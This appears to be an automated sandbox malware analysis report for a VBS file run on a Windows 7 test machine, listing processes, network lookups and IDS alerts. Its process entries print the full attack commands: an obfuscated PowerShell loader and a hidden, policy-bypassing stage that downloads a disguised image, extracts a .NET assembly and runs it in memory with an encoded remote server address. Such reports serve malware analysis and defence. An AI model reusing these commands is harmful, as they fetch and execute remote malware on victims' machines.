Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 28, 2023, 7:05 p.m. | Oct. 28, 2023, 7:08 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlaexpoittt.vbs
800-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIg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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2132-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2228
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.43.165.105 |
paste.ee | 172.67.187.200 | |
uploaddeimagens.com.br | 104.21.45.138 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49161 -> 104.21.84.67:443 | 2034978 | ET POLICY Pastebin-style Service (paste .ee) in TLS SNI | Potential Corporate Privacy Violation |
TCP 192.168.56.103:49161 -> 104.21.84.67:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49167 -> 172.67.215.45:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49161 104.21.84.67:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=paste.ee | cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15 |
TLSv1 192.168.56.103:49167 172.67.215.45:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71 |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET https://paste.ee/d/hgAnq |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIVQByShUWCcUzBkdIGwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBoShUWCcUzBkdIHQShUWCcUzBkdIdShUWCcUzBkdIBwShUWCcUzBkdIHMShUWCcUzBkdIOgShUWCcUzBkdIvShUWCcUzBkdIC8ShUWCcUzBkdIdQBwShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBuShUWCcUzBkdIHMShUWCcUzBkdILgBjShUWCcUzBkdIG8ShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIGIShUWCcUzBkdIcgShUWCcUzBkdIvShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBzShUWCcUzBkdIC8ShUWCcUzBkdIMShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdIDQShUWCcUzBkdILwShUWCcUzBkdI2ShUWCcUzBkdIDMShUWCcUzBkdINShUWCcUzBkdIShUWCcUzBkdIvShUWCcUzBkdIDYShUWCcUzBkdINwShUWCcUzBkdI2ShUWCcUzBkdIC8ShUWCcUzBkdIbwByShUWCcUzBkdIGkShUWCcUzBkdIZwBpShUWCcUzBkdIG4ShUWCcUzBkdIYQBsShUWCcUzBkdIC8ShUWCcUzBkdIcgB1ShUWCcUzBkdIG0ShUWCcUzBkdIcShUWCcUzBkdIBlShUWCcUzBkdIC4ShUWCcUzBkdIagBwShUWCcUzBkdIGcShUWCcUzBkdIPwShUWCcUzBkdIxShUWCcUzBkdIDYShUWCcUzBkdIOQShUWCcUzBkdI3ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdINQShUWCcUzBkdIzShUWCcUzBkdIDUShUWCcUzBkdIMgShUWCcUzBkdI5ShUWCcUzBkdICcShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHcShUWCcUzBkdIZQBiShUWCcUzBkdIEMShUWCcUzBkdIbShUWCcUzBkdIBpShUWCcUzBkdIGUShUWCcUzBkdIbgB0ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdIE4ShUWCcUzBkdIZQB3ShUWCcUzBkdIC0ShUWCcUzBkdITwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIE4ShUWCcUzBkdIZQB0ShUWCcUzBkdIC4ShUWCcUzBkdIVwBlShUWCcUzBkdIGIShUWCcUzBkdIQwBsShUWCcUzBkdIGkShUWCcUzBkdIZQBuShUWCcUzBkdIHQShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJShUWCcUzBkdIB3ShUWCcUzBkdIGUShUWCcUzBkdIYgBDShUWCcUzBkdIGwShUWCcUzBkdIaQBlShUWCcUzBkdIG4ShUWCcUzBkdIdShUWCcUzBkdIShUWCcUzBkdIuShUWCcUzBkdIEQShUWCcUzBkdIbwB3ShUWCcUzBkdIG4ShUWCcUzBkdIbSh